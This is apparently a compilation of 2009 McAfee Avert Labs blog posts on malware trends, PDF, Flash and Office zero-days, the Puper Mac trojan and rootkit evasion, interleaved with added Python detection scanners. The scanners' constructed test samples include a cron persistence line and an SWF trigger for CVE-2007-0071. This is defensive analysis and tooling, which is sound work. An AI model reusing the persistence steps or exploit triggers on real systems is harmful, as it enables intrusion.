    Our researchers also found that over the course of 30 days AutoRun malware had troubled more than 27 million files. AutoRun malware, which exploits Windows’ AutoRun capabilities, does not require any user clicks to activate, and is most often spread through portable USB and storage devices. The rate of detection surpasses even that of the infamous Conficker worm by 400 percent, making AutoRun one of the most prevalent pieces of malware in the world.

    Some of the other areas we cover and discuss:

    Cybercrime as a Service
    As the number of botnets continues to grow, malware writers have begun to offer malicious software as a service to those who control these bots. By exchanging or selling resources, cybercriminals distribute new malware to wider audiences instantaneously. Programs like Zeus–an easy-to-use Trojan creation tool–continue to make the creation and management of malware even easier.

    Cybercriminals Target Twitter, Social Networks
    Twitter’s growth in popularity has made it a new target for cybercriminals in the last three months. Malware like the “Mikeey” worm and new variations of the Koobface Trojan attack users through tweets and abbreviated URLs. Spam Twitter accounts are becoming increasingly prevalent. Twitter administrative accounts have also been hacked on multiple occasions, giving cybercriminals access to the private accounts of celebrities and politicians, such as Britney Spears and Barack Obama and even allowing for the publication of sensitive internal strategy documents on the Web. Facebook and MySpace remain strong attack vectors for cybercriminals. In May, spam messages on social networks pointed users to more than 4,000 new Koobface binaries!

    To view the McAfee Q2 Threats Report, go here.

    Counting Badness

    Following up on the recent post by my colleague Dave Marcus concerning malware growth, the guys from AV-Test in Germany just released their updated stats. To avoid confusion when comparing the different numbers, here’s a quick explanation of the different counts:

    AV-Test counts unique binaries. Unique means different cryptographic hashes. So the same Trojan, obfuscated with 10 different packers results in 10 unique binaries. This is often due to the impact of server-side polymorphism, where you get a unique binary every time you download a file.

    Our outbound counting, as used by Marcus, counts the threats for which we have to create a driver for detection. If in the example above we are able to look beneath the obfuscation layer of the packers, the 10 different binaries would be counted as just one Trojan. In addition to that, we frequently use generic detection, in which a single count could hit on thousands of minor variants.

    Now that the different ways of counting may be a bit clearer, let’s look at the bad news:

    AV-Test’s count has come close to 22,000,000 samples in June.


    This by itself is disturbing, but the really disturbing trend is visible when we look at the growth month over month:


    The growth had been fairly constant over the last year, but that has now changed.

    We are now seeing a major increase in the monthly growth, topping one million new samples each month in AV-Test’s count. And this time it’s not only samples (the same piece of malware packed over and over again) but also actual new malware. If you look at Marcus’ numbers again–growth in 2009 has nearly tripled compared with 2008 and remembering that we count malware rather than samples–this indicates there has been a shift recently in malware production. Tons of new Trojans have been developed and released on top of the reused stuff.

    So keep your machine updated, not just AV and the OS but all applications. Watch out where you surf. (SiteAdvisor may help you there.) And take care what links or attachments you trust in emails and all other forms of messages. All this will help you enjoy the summer!

    New Zero-Day Attacks Use PDF Documents

    As we already mentioned multiple times in the past, exploits that take advantage of newly discovered holes in popular applications represent a growing threat to Internet users. Many, if not most, computer systems are vulnerable to these attacks. More evidence shows zero-day attacks remain the preferred choice of cybercriminals.

    Today, a new unpatched Adobe vulnerability has been discovered in the wild. It takes advantage of a new feature to add interactive Flash (SWF) content into PDF files. This bug was found to affect at least Adobe Reader and Acrobat 9.1.2, as well as Adobe Flash Player 9 or later.

    In our investigation of the issue, we found that Acrobat 9 introduced a new “Rich Media” annotation type, which uses Acrobat’s built-in Flash Player to play SWF content. In the current attack, specially crafted SWF files were embedded into PDF documents. These can cause Adobe Reader to execute arbitrary code when viewed. When successful, shellcode in the exploit is executed by Adobe Reader. The picture below depicts how the shellcode works and what it does:

    Shellcode created by FWS

    It first gets a KERNEL32.dll image base using the Windows PEB structure, sets up the required Windows APIs, then decrypts and executes its malware payload. This specific malicious PDF file contains three embedded executables encoded using a simple 1-byte XOR key. When run, it drops a file called SUCHOST.EXE and sends the information gathered from the infected machine to a free host-redirection service based in China:

    • [blocked].3322.org
    • [blocked].2288.org

    The victim is then redirected to other malicious IP address(es). This malware acts as a backdoor to allow remote access to the infected computer.

    According to Adobe, the Rich Media annotation is new to Acrobat 9.x and will not be understood by PDF viewers that support only up to the Acrobat 8 specification. Thus an SWF file placed into a PDF with Acrobat 9 cannot be read by Acrobat or Adobe Reader 8 and older versions, and those versions are not vulnerable to this attack.
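Two of the indicators described above can be checked for in a PDF before it is ever opened: the Rich Media annotation the exploit rides on, and embedded Windows executables hidden under a single-byte XOR key. The scanner below is an added example, not McAfee code. It matches the raw annotation keys (an assumption that they are not themselves hidden inside object streams) and, for each of the 256 possible keys, looks for an encoded `MZ` signature whose `e_lfanew` field points at an encoded `PE\0\0`. The sample PDF and the 0x37 key are constructed.

```python
"""Flag RichMedia annotations and XOR-encoded PE images in a PDF.

Added example, not McAfee code.  The sample document is constructed and the
XOR key 0x37 is arbitrary; key 0x00 in the results means a plain executable.
"""
import re
import struct

# Acrobat 9 "Rich Media" annotation keys (assumption: matching the raw object
# dictionaries is enough; object streams would need decompressing first).
RICHMEDIA_KEYS = re.compile(rb"/Subtype\s*/RichMedia|/RichMediaContent|/RichMediaSettings")


def count_richmedia(pdf):
    return len(RICHMEDIA_KEYS.findall(pdf))


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def find_xor_encoded_pe(data):
    """Return (offset, key) for every PE image found under a 1-byte XOR key.

    For each key: find the encoded 'MZ', read the DOS header's e_lfanew field
    (offset 0x3C) under the same key, and confirm 'PE\\0\\0' sits where it
    points.  Requiring both signatures keeps random 2-byte matches out.
    """
    hits = []
    for key in range(256):
        needle = xor_bytes(b"MZ", key)
        pos = data.find(needle)
        while pos != -1:
            if pos + 0x40 <= len(data):
                raw = struct.unpack_from("<I", data, pos + 0x3C)[0]
                e_lfanew = raw ^ (key * 0x01010101)      # XOR every byte of the field
                pe = pos + e_lfanew
                if (0x40 <= e_lfanew <= 0x400 and pe + 4 <= len(data)
                        and xor_bytes(data[pe:pe + 4], key) == b"PE\0\0"):
                    hits.append((pos, key))
            pos = data.find(needle, pos + 1)
    return hits


def scan_pdf(pdf):
    return {"richmedia_annotations": count_richmedia(pdf),
            "embedded_pe": find_xor_encoded_pe(pdf)}


def make_sample(key=0x37):
    """Constructed PDF: one RichMedia annotation plus a minimal XOR-encoded PE stub.

    Returns the bytes and the offset at which the encoded stub starts."""
    head = (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Annot /Subtype /RichMedia >> endobj\n"
            b"3 0 obj << /Length 148 >> stream\n")
    pe = bytearray(0x80 + 20)                 # DOS header, padding, PE header
    pe[0:2] = b"MZ"
    pe[0x3C:0x40] = struct.pack("<I", 0x80)   # e_lfanew -> 0x80
    pe[0x80:0x84] = b"PE\0\0"
    pdf = head + xor_bytes(bytes(pe), key) + b"\nendstream endobj\n%%EOF\n"
    return pdf, len(head)


if __name__ == "__main__":
    sample, _ = make_sample()
    print(scan_pdf(sample))
```

On a real document the `embedded_pe` offsets can be fed straight back into `xor_bytes` with the reported key to carve the dropped executables for analysis; a RichMedia annotation on its own is only a reason to look closer, since the feature has legitimate uses.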

    Although details of this vulnerability have not yet become public, more attackers are likely to take advantage of this weakness. For McAfee customers, both the PDF and its associated payload can be proactively detected as “Exploit-PDF.t” since the 5683 DATs (released July 21).

    Even though anti-malware vendors continue to add detection for new zero-day threats, there are several things you can do to mitigate such risks. Refrain from opening attachments from untrusted sources and visiting untrustworthy web sites.

    This bug is currently being investigated by the Adobe Product Security Incident Response Team.

    (Thanks to Abhishek Karnik and Aditya Kapoor for helping to analyze the malware.)


    Malware Is Their Business…and Business Is Good!

    I cribbed the title from Megadeth–I admit it. However, when looking at this year’s growth in malware it seems disturbingly appropriate. Global economic downturn or not, malware production continues at a record-setting pace because this is how many cybercriminals make their money. (Malware long ago stopped being about fun and bragging.)

    We at Avert Labs have seen almost as much unique malware in the first half of 2009 as we did in ALL of 2008. This is quite something when you consider that in 2008 we saw the greatest ever growth in malware:

    Unique Malware Growth

    For you math and data junkies, that comes out to an average of 200,000 unique pieces monthly, or more than 6,000 daily. Yep–that was over 6,000 on a daily basis. Bear in mind these are malware we consider unique (something we had to write a driver for); this does not count all the other malware we detect generically or heuristically, but we will save that discussion for another post. When you add in the generic and heuristic detections the number becomes truly mind boggling.

    Even when compared to the first half of 2008, the growth is almost three times what it was. The sheer growth is even challenging Moore’s Law a bit.

    Half Year Malware Comparison

    Our latest whitepaper, Financial Fraud and Internet Banking: Threats and Countermeasures, explains how much of this malware can be used to scam and steal from users. The new whitepaper was written by one of our French researchers, François Paget. It can be found here.

    There are many reasons why malware continues to grow, but it is mainly a criminal’s game at this point. Malware steals data. The people who write and distribute malware are criminals. Pretty plain and simple to me. The tools and code are readily available and that will certainly not change, but (and this is important) it is also definitely NOT doomsday. Staying educated and updated goes a long way toward safe computing.

    Malware From Celebrity Video: But I Thought I Just Installed a Video Player!

    Erin Andrews is a popular ESPN sports reporter in the United States who recently made headlines outside the sports arena. In an unfortunate case of privacy invasion, a video purportedly capturing private moments of the reporter through a hotel room peephole was released on the Internet. The video generated a considerable amount of news.

    In our world of anti-malware, we follow a simple formula: “Media + Celebrity = Watch out for malware”. Whether you are an eager fan or just someone surfing the web for news, beware. An Internet search with the right keywords on your favorite search engine can be expected to lead you to malware. In our investigation of this case, it led us to a malicious website hosted at [removed].report-cnn.com/[removed].

    Fake Video Message

    Although it was made to look like a real one, this website is NOT related to CNN. At the time of research, it was still live and distributing malware using the “you need a video player” technique that has been used repeatedly in similar attempts in the past. With this method, the user is enticed with an attractive video but told that a new video player program must be installed first.

    The victim clicks on a link that downloads and installs an executable program, which in turn installs malware. This is usually followed by a pop-up message reporting that the downloaded video player program is corrupted!

    Install Video Player Message

    The current case comes with a slight twist. An option to download the “video player” is offered only if you already have Adobe Flash installed. This first step lets users view some initial pictures, as if they were browsing legitimate news content on the site. It then further entices users to view the “live video” by installing a video player, which instead contains malware. Once the malware is downloaded, a video is actually streamed to the user from an external link on Google. This link, of course, has nothing to do with the downloaded video player. Gullible users would actually believe that running the downloaded program enabled them to view the video.

    This malicious website recognizes the target operating system by checking the User-Agent header sent to the web server by the web browser client. In our tests, a .exe file is delivered to a Windows-based web browser while a .dmg file is delivered to Mac OS-based web browsers.

    Downloaded Files

    The malware samples downloaded from this site are currently detected as FakeAlert-DA and FakeAlert-EL. For Mac OS users, the MediaPlayer.dmg malware is detected as the OSX/Puper.a Trojan. In other related cases, we are currently detecting the samples as Generic FakeAlert.a and Generic FakeAlert.c.
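The User-Agent switch described above is visible from the defender's side in proxy logs: one URL hands Windows clients an .exe and Mac clients a .dmg. The script below is an added example, not McAfee code. It groups log records by URL, maps each User-Agent to an OS family and flags URLs whose executable content type changes with the client OS. The log lines are constructed and use the placeholder hosts video-player.invalid and updates.example.invalid.

```python
"""Flag URLs that serve a different executable depending on the client OS.

Added example, not McAfee code.  SAMPLE_LOG is constructed: timestamp,
client address, quoted User-Agent, URL and the response content type.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
2009-07-20T10:01:02Z 10.0.0.5 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" http://video-player.invalid/player/download application/x-msdownload
2009-07-20T10:01:09Z 10.0.0.8 "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7)" http://video-player.invalid/player/download application/x-apple-diskimage
2009-07-20T10:02:30Z 10.0.0.5 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" http://video-player.invalid/player/index.html text/html
2009-07-20T10:02:41Z 10.0.0.8 "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7)" http://video-player.invalid/player/index.html text/html
2009-07-20T10:03:15Z 10.0.0.9 "Mozilla/5.0 (Windows; U; Windows NT 6.0)" http://updates.example.invalid/tool.exe application/x-msdownload
"""

LINE = re.compile(r'^(\S+) (\S+) "([^"]*)" (\S+) (\S+)$')
EXECUTABLE_TYPES = {"application/x-msdownload",        # .exe
                    "application/x-apple-diskimage",   # .dmg
                    "application/octet-stream"}


def os_family(user_agent):
    ua = user_agent.lower()
    if "windows" in ua:
        return "windows"
    if "mac os x" in ua or "macintosh" in ua:
        return "mac"
    return "other"


def parse_log(text):
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            ts, client, ua, url, ctype = m.groups()
            yield {"ts": ts, "client": client, "os": os_family(ua), "url": url, "type": ctype}


def find_os_cloaking(records):
    """Return {url: {os: [content types]}} for URLs that hand more than one OS
    family an executable and vary the executable type between them."""
    by_url = defaultdict(lambda: defaultdict(set))
    for r in records:
        if r["type"] in EXECUTABLE_TYPES:
            by_url[r["url"]][r["os"]].add(r["type"])
    flagged = {}
    for url, per_os in by_url.items():
        types_seen = set().union(*per_os.values())
        if len(per_os) > 1 and len(types_seen) > 1:
            flagged[url] = {family: sorted(types) for family, types in per_os.items()}
    return flagged


if __name__ == "__main__":
    for url, detail in find_os_cloaking(parse_log(SAMPLE_LOG)).items():
        print(url, detail)
```

The check only fires once both OS families have fetched the URL, so it suits retrospective hunting over a day's logs rather than inline blocking; a server that labels both payloads application/octet-stream would need the file name or magic bytes compared instead of the content type.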

    We advise Internet users to refrain from installing programs that are linked to hot news and media sites.

    New Wave Of Web Attacks Exploits Office

    Today, Microsoft released a security advisory on active attacks in the wild using a vulnerability in Microsoft Office Web Components. Computers with Microsoft Office features that use vulnerable versions of the Microsoft Office Web Components could be infected with malware when browsing malicious websites in Internet Explorer.

    Our investigation shows that Exploit-CVE2009-1136, a new zero-day exploit, was added to the web exploit toolkits that had widely distributed Exploit-MSDirectShow.b on hijacked websites in China just the previous week. Since the start of this new wave of attacks, the new Trojans installed by Exploit-CVE2009-1136 have been detected by our Artemis technology, which also gives us a global view of the spread of this new threat.

    For one of the new Trojan samples used by Exploit-CVE2009-1136, we first saw Artemis queries coming from China at 11:53 GMT on July 13th, 2009. We didn’t have automatic protection at that point, but the various systems analyzing the threat details soon marked it as malicious.

    By now, this sample has spread to many other Internet users in China and has been queried and blocked by Artemis more than 328 times at more than 145 unique IP addresses (ISP, not end point).

    artemis img

    Besides China, we only saw Artemis queries coming from Virus Total (Spain) and fellow malware researchers in the UK and Germany in small numbers.

    We will post more information as we receive it.

    Variant of Mac Malware Another Party Puper

    We recently received a new sample of the Mac malware OSX/Puper.a. This file [MD5 Sum: 428143005E07E510302BA431FE0C28CC], which disguises itself as a Mac Cinema Installer, was recently mentioned in PC Magazine.

    When the DMG file is executed on the Mac, it displays the following message:

    As the execution continues, the malware gets installed on the machine with the root user’s credentials. Below is a screen shot of the malware after installation:

    The file AdobeFlash in the screen above is the malicious script file. This file is obfuscated using Uuencode and looks like this before decoding:

    And like this after decoding:

    From the shot above we can see another set of obfuscated code after the schedule-task instructions. We can also see that the malware creates a scheduled job to run itself once every five hours, as shown below:

    Decoding the rest of the script reveals the following:

    From the screen above we see that the malware downloads the file generator.pl and executes it.
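Unwrapping the AdobeFlash script above is a matter of peeling uuencode layers one at a time: decode the outer begin/end block, then look for another block inside the decoded text. The script below is an added example, not McAfee code, that does exactly that with the standard `binascii` uuencode primitives. The two-stage sample it works on is constructed (the cron line, file names and the placeholder.invalid host stand in for the real ones).

```python
"""Peel nested uuencode layers off an obfuscated shell script.

Added example, not McAfee code.  make_sample() builds a constructed two-stage
script in the shape described in the post; nothing in it is the real malware.
"""
import binascii
import re

UU_BLOCK = re.compile(r"^begin \d{3} (\S+)\n(.*?)^end[ \t]*$", re.M | re.S)


def uudecode(body):
    """Decode the data lines found between 'begin' and 'end'."""
    out = bytearray()
    for line in body.splitlines():
        if line and line != "`":            # a lone '`' is the terminator line
            out += binascii.a2b_uu(line)
    return bytes(out)


def uuencode(data, name):
    """Constructed-sample helper: the inverse of uudecode, 45 bytes per line."""
    lines = ["begin 644 %s" % name]
    for i in range(0, len(data), 45):
        lines.append(binascii.b2a_uu(data[i:i + 45]).decode("ascii").rstrip("\n"))
    lines += ["`", "end"]
    return "\n".join(lines) + "\n"


def peel_uuencode(text, max_layers=8):
    """Return [(file name, decoded text), ...], outermost layer first."""
    layers, current = [], text
    for _ in range(max_layers):
        m = UU_BLOCK.search(current)
        if not m:
            break
        decoded = uudecode(m.group(2)).decode("utf-8", "replace")
        layers.append((m.group(1), decoded))
        current = decoded                   # search the next block inside this layer
    return layers


def make_sample():
    """Stage 1 installs a five-hourly cron job and carries stage 2 as a
    second uuencoded block after it; both stages are constructed text."""
    stage2 = ("#!/bin/sh\n"
              "# constructed stage 2: fetches generator.pl from placeholder.invalid and runs it\n")
    stage1 = ("#!/bin/sh\n"
              "# constructed stage 1 (path is a placeholder)\n"
              "echo '0 */5 * * * /path/to/AdobeFlash' | crontab -\n"
              + uuencode(stage2.encode(), "stage2"))
    return uuencode(stage1.encode(), "AdobeFlash")


if __name__ == "__main__":
    for name, text in peel_uuencode(make_sample()):
        print("==", name, "==")
        print(text)
```

Each returned layer is worth keeping: the stage-1 text carries the persistence (the cron schedule) and the inner-most text the download stage, which is what the screenshots in the post show in two separate steps.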

    Although the number of malware for Macs still remains tiny when compared with the number of malware for Microsoft Windows, new variants of malware such as this remind us to be careful.

    SWF Flash Exploits: Old Wine in a New Bottle

    Adobe Flash applications have been a major security concern during the past couple of years. The large number of published Flash vulnerabilities, coupled with its popularity and wide distribution, makes Flash files an attractive target for cybercriminals. Infected banner ads are not new; these Flash-based “malvertisements” have plagued ad servers and popular websites for a very long time.

    A malicious Flash file can be crafted to contain an image or an animation to fool unsuspecting users into believing the file is legitimate. Lately, we have observed a spike in the number of websites hosting malicious Flash files that exploit the integer-overflow vulnerability in the DefineSceneAndFrameLabelData tag. These are popularly known as Exploit-CVE2007-0071.

    Although the vulnerability has been fixed for some time, the bad guys are always coming up with new and progressive mechanisms to evade detection.

    Flash Player 9 and later comes with a new virtual machine called ActionScript Virtual Machine 2 (AVM2), which is designed to execute programs written in the ActionScript 3.0 language. ActionScript 3.0 supports a native method called loadBytes().

    The flash.display.Loader class supports the loadBytes method, which takes a byte array to fill the loader with data. The bytes injected can be in the form of GIF, JPG, PNG, or SWF files. Embedding the vulnerable SWF (small web format) file inside the loader provides attackers the multifold advantage of ensuring successful exploitation while complicating the analysis for researchers.

    The image above shows the embedded malicious SWF file inside the loader file. This loader uses the loadBytes method to inject the bytes into the security context of the application.

    In recent versions of the exploit, the embedded SWF file is encrypted using various obfuscation techniques such as byte-shifting algorithms or random XOR keys, as shown in the figure below.

    We expect this trend to continue as cybercriminals target low-hanging fruit such as popular applications, and Flash is no exception. As always, make sure you are protected and that Flash Player is updated to the latest version. Happy surfing. :)
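Both halves of the technique described above are visible by walking an SWF's tag list: the DefineSceneAndFrameLabelData tag whose scene count triggers CVE-2007-0071, and a DefineBinaryData payload that is itself an SWF (plain or under a single-byte XOR key) waiting to be passed to `Loader.loadBytes()`. The scanner below is an added example, not McAfee code. It handles both FWS and zlib-compressed CWS files; MAX_SCENES is an assumed sanity threshold and the loader-style sample it tests against is constructed.

```python
"""Walk an SWF's tags and flag the CVE-2007-0071 trigger and hidden inner SWFs.

Added example, not McAfee code.  MAX_SCENES is an assumed threshold; the
sample movies are constructed with the helpers at the bottom.
"""
import struct
import zlib

SCENE_TAG = 86         # DefineSceneAndFrameLabelData
BINARY_DATA_TAG = 87   # DefineBinaryData (payload often fed to loadBytes)
MAX_SCENES = 0x10000   # assumption: no real movie declares more scenes than this


def encoded_u32(buf, pos):
    """Decode the SWF variable-length EncodedU32 at pos; returns (value, new pos)."""
    value, shift = 0, 0
    for i in range(5):
        if pos + i >= len(buf):
            break
        byte = buf[pos + i]
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos + i + 1
        shift += 7
    return value, pos + 5


def swf_body(data):
    """Return the uncompressed body after the 8-byte header (FWS or zlib CWS)."""
    signature = data[:3]
    if signature == b"FWS":
        return data[8:]
    if signature == b"CWS":
        return zlib.decompress(data[8:])
    raise ValueError("not an SWF: %r" % signature)


def iter_tags(body):
    """Yield (code, payload) for each tag; the body starts with the frame RECT."""
    nbits = body[0] >> 3                   # RECT: 5-bit field width, then 4 fields
    pos = (5 + 4 * nbits + 7) // 8 + 4     # RECT bytes + frame rate + frame count
    while pos + 2 <= len(body):
        header = struct.unpack_from("<H", body, pos)[0]
        code, length = header >> 6, header & 0x3F
        pos += 2
        if length == 0x3F:                 # long form: explicit 32-bit length
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        yield code, body[pos:pos + length]
        pos += length
        if code == 0:                      # End tag
            break


def embedded_swf_key(payload):
    """Return the XOR key under which payload is an SWF whose length field
    matches its size (0 means an unobfuscated SWF), or None."""
    if len(payload) < 8:
        return None
    for key in range(256):
        head = bytes(b ^ key for b in payload[:8])
        if head[:3] in (b"FWS", b"CWS") and struct.unpack("<I", head[4:8])[0] == len(payload):
            return key
    return None


def scan_swf(data):
    findings = []
    for code, payload in iter_tags(swf_body(data)):
        if code == SCENE_TAG and payload:
            scenes, _ = encoded_u32(payload, 0)
            if scenes > MAX_SCENES:
                findings.append("DefineSceneAndFrameLabelData: implausible scene count %d" % scenes)
        elif code == BINARY_DATA_TAG and len(payload) > 6:   # 2-byte ID + 4 reserved
            key = embedded_swf_key(payload[6:])
            if key is not None:
                findings.append("DefineBinaryData: embedded SWF (xor key 0x%02x)" % key)
    return findings


# --- constructed samples ---------------------------------------------------
def tag(code, body):
    if len(body) < 0x3F:
        return struct.pack("<H", (code << 6) | len(body)) + body
    return struct.pack("<HI", (code << 6) | 0x3F, len(body)) + body


def build_swf(tags, compress=False):
    """Minimal SWF: version 9, empty RECT, 24 fps, 1 frame, then the given tags."""
    body = b"\x00" + b"\x00\x18" + b"\x01\x00" + tags
    length = 8 + len(body)
    if compress:
        return b"CWS\x09" + struct.pack("<I", length) + zlib.compress(body)
    return b"FWS\x09" + struct.pack("<I", length) + body


def make_sample(key=0x5A, compress=False):
    """Loader-style SWF: an oversized scene count plus an XOR-hidden inner SWF."""
    inner = build_swf(tag(0, b""))
    hidden = bytes(b ^ key for b in inner)
    return build_swf(tag(SCENE_TAG, b"\xff\xff\xff\xff\x0f")
                     + tag(BINARY_DATA_TAG, b"\x01\x00" + b"\x00" * 4 + hidden)
                     + tag(0, b""), compress)
```

The length-field check in `embedded_swf_key` is what keeps the XOR search honest: a three-byte signature match alone would fire on random data about once per few million bytes. A byte-shifted inner file, the other obfuscation the post mentions, needs its own candidate transform in place of the XOR loop, but the rest of the walk is unchanged.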

    An Artemis View of Zero-Day Attacks

    In our blog from yesterday, we described how Exploit-MSDirectShow.b has been widely deployed on hijacked websites in China, targeting Internet Explorer users. When a victim browses one of these sites, malware is downloaded to the computer. To better understand the current impact of these attacks, we have monitored the prevalence of its downloaded malware through Artemis.

    Since yesterday, our Artemis technology has detected new malware installed by Exploit-MSDirectShow.b that was targeted to certain geographical regions of the world.

    In China, a new sample variant was queried by Artemis more than 180 times at more than 70 unique IP addresses (ISP, not end point) over a 24-hour period. This is represented by the many red dots in the following figure:

    artemis

    This particular sample was first seen only in mainland China, but we soon saw Artemis queries from Korea, Japan, Australia, Singapore, Taiwan, and the United States in very small numbers. As we know, the web has no boundaries and the potential risks of the DirectShow zero-day vulnerability are not limited to specific languages or regions. We will closely monitor this trend.

    This sample is already heuristically detected in the DATs and Artemis. After our analysis, it has now been classified as Downloader-BRT Trojan.

    McAfee Coverage of the DirectShow Exploit

    Since we reported about the new attacks against Internet Explorer exploiting a vulnerability in a DirectShow ActiveX object, we have released DATs/coverage updates for many of our products and technologies.

    Current status for each of the content areas:

    • Malware: Coverage is provided for exploit code in the 5668 DATs, released on July 6
    • HIPS: Generic buffer overflow should provide coverage
    • McAfee Network Security Platform: Coverage was provided on July 6
    • McAfee Vulnerability Manager: Coverage was provided on July 6
    • MNAC: Coverage will be provided in the next release
    • VirusScan Enterprise: Buffer overflow protection should provide coverage
    • McAfee Web Gateway, Anti-Malware Edition: Behavior analysis provides coverage against currently known exploits

    Other Internet users and website administrators can also download the free Stinger tool to scan computers and web pages for known malware relating to this attack:

    We will continue to monitor the situation to provide comprehensive coverage.

    New Attacks Against Internet Explorer

    If you read Geok Meng and Xiaobo’s blog published in December last year, this must almost seem like a movie sequel. Over the July 4 weekend, an exploit targeting a zero-day vulnerability in the Microsoft DirectShow ActiveX object was widely discovered on many Chinese websites.

    At the time of research, over a hundred hijacked sites were found to be injected with malicious links that are still actively hosting this Trojan. Many of these sites are what you and I would not consider “malicious” or “dodgy.” For example, some of them are school websites or the local community club’s website that had been hijacked or infected.

    When browsing these sites (hijacked site #1), the victim is hyperlinked to hijacked site #2, which seems to act as a proxy. In this case, if someone were to audit the source code of hijacked site #1, he or she would see that the links are connected to sites that look legitimate. Hijacked site #2 is, subsequently, hyperlinked to a malicious site hosting a web exploit toolkit.

    During our research, one of the things we found interesting was that the web exploit toolkit explicitly checks that the referring hyperlinks do not originate from the “.gov.cn” and “.edu.cn” domains, which are used by Chinese government and education sites, respectively. If the references do not come from either of these domains, it starts sending a cocktail of exploits including:

    • Exploit-MSDirectShow.b (zero-day)
    • Exploit-XMLhttp.d
    • Exploit-RealPlay.a
    • JS/Exploit-BBar
    • Exploit-MS06-014

    Each of these exploits targets a different application that could be vulnerable–Internet Explorer 6 and 7, DirectShow ActiveX, RealPlayer, Baidu Toolbar–that can be accessed via the Internet Explorer browser.

    From past investigations, this toolkit has been widely used on many Chinese hijacked sites this year. The attackers may be trying to avoid or delay attention from the Chinese government.

    When successful, the attacker installs a downloader Trojan that could download other malware.

    This zero-day vulnerability has been verified to affect at least Windows XP systems with Internet Explorer 6.x and 7.x. However, on IE 7, the browser on Windows Vista systems, risky ActiveX objects are blocked by default, which may mitigate this zero-day attack. Users should ensure that their systems are always kept up to date against the older exploits.

    The zero-day exploit will be detected as Exploit-MSDirectShow.b by McAfee VirusScan in today’s 5668 DATs. The downloader Trojan installed by this exploit can be proactively detected as Generic.dx since the 5567 DATs (released March 28).

    We will post more information as we receive it.

    (Thanks to our colleague Wei Wang for assistance in this analysis.)

    Fake Alerts Uncovered

    It has been almost a year since rogue anti-virus products, a.k.a. scareware, became rampant. These Trojan families are typically spread via drive-by downloads, search-engine-optimization poisoning, spam campaigns, and clever social engineering.
    Having discussed these methods in earlier blogs, today we will look at the protection mechanisms these FakeAlert Trojan families adopt to evade detection by antivirus vendors.

    • Code obfuscation using junk instructions

    In the above screenshot, lots of junk code is visible between valid instructions. Junk instructions are used widely across FakeAlert families.

    • Fake API calls

    The screenshot shows a call to the API SetArcDirection, which the code does not need. Such unnecessary API calls are used by malware to defeat emulation. Sometimes these families also call APIs that don’t exist, to check whether they are being emulated.

    • Customized packer

    Many FakeAlert families use their own custom packers and encryption routines. Some of the families patch existing packers.

    • Use of XMM and MMX instruction sets

    XMM, MMX and FPU instructions that the code does not need, alongside other junk code, are also used by most FakeAlert families.

    The techniques discussed above are not new and have been used in notable malware. But FakeAlert Trojans use these evasion techniques to their full potential with every new variant. Just when we thought we were seeing a decline in adware and spyware, FakeAlert Trojan families have stepped in to claim the “scum of the Internet” tag.

    Generic Rootkit.d Strikes Again in New Variant

    A few days ago I got a chance to look at a recent variant of the DNSChanger.ad. It drops a common rootkit that is mostly associated with FakeAlert and DNSChanger Trojans. Over a period of time the dropped sys file names have changed from tdss*.sys to seneka*.sys to skynet*.sys and so on. Our memory detection and cleaning for this rootkit is Generic Rootkit.d. The techniques of this threat are well known now. It basically uses inline hooks on IofCallDriver, IofCompleteRequest, NtFlushInstructionCache, NtEnumerateKey, etc. This Trojan removes permissions from its registry entries as well.

    The malware has a hidden sys file in the system32\drivers directory with a name like skynet*.sys. One can use a rootkit analysis tool or just windbg to restore the inline hooks installed by the malware. Even though the malicious file is no longer hidden after hook restoration, the malware can recreate the file after its deletion. It is common for malware to “watch” or recreate its components, but the curious thing was that File Monitor (filemon) did not show any activity, and other API-tracing approaches also didn’t point to anything that could explain the rebirth of this file.

    Taking a closer look, we found that the malware uses one of the delayed system worker threads to call, at regular intervals, ZwCreateFile in a loop created using KeDelayExecutionThread. The following figure shows the relevant malware code and thread.

    Figure 1 File Creation loop

    This explains how the file is recreated after its deletion. This thread also watches the malware’s registry entries. It continuously restores the system service descriptor table (SSDT) using the code shown below, so any tracing utility that hooks the SSDT to monitor activity would not work.

    Figure 2 SSDT rewrite

    If it were just SSDT rewriting, then filemon should have reported the file activity. But the malware also removes all filesystem filter drivers; because filemon also uses a filesystem filter, it didn’t report anything. The figure below shows the device stack before and after infection. Note that all filters are removed after infection.

    Figure 3 Device stack before and after infection


    And here is the code that removes attached filters.

    Figure 4 Detach filter

    Actually, only the attached-device field of the NTFS device object is nulled out; the rest of the stack is left dangling.

    Figure 3 also shows that not only is the filemon filter driver removed but even the Filter Manager has been effectively removed. Removing all filters and rewriting the SSDT will thwart analysis tools that use these techniques, but may also break other software. Obviously it does not matter to malware as long as its rootkit works in a stealthy manner in most environments. It’s a tradeoff that many malware make, and this one has made its choice.

    Michael Jackson News Affects Web Traffic

    The announcement of Michael Jackson’s death has caused immediate effects on the Web 2.0 world. The impact ranged from the interruption on Facebook of coverage of Farrah Fawcett’s death to a surge experienced by Twitter. The Web 2.0 world is definitely abuzz with traffic regarding his passing.

    Within hours the percentage of “long-tail” URL traffic associated with Michael Jackson was growing. It peaked around 1 p.m. Eastern time today and now seems to be dropping. These URLs contained mostly generic information about Jackson–blogs, posts, tributes, photos, and collections of his entertainment past. And, yes, some even contained links to malware or rogue anti-virus software.

    How do people find these URLs? We’ve seen spam, tweets, blog postings, group postings, and even mobile phone alerts. In addition, as predicted by Avert Labs, we’ve seen search-engine optimization (SEO) in action. There were several attempts to capitalize on redirecting users to known malware-serving sites associated with other SEO campaigns. We found it interesting during our research to see how fast some of the search engines seemed to respond to this. One popular keyword search done around 9 p.m. yesterday showed seven of the top 10 links going to some of these well-known malicious servers. That same search done an hour later showed only one of the top 10 involved.

    As the entertainment industry continues to pay tribute and homage to Jackson, we expect that spam and SEO efforts will grow over the weekend. Eventually a new piece of news will replace this event, and there will be a new story–with much the same results.

    More Password-Theft Shenanigans

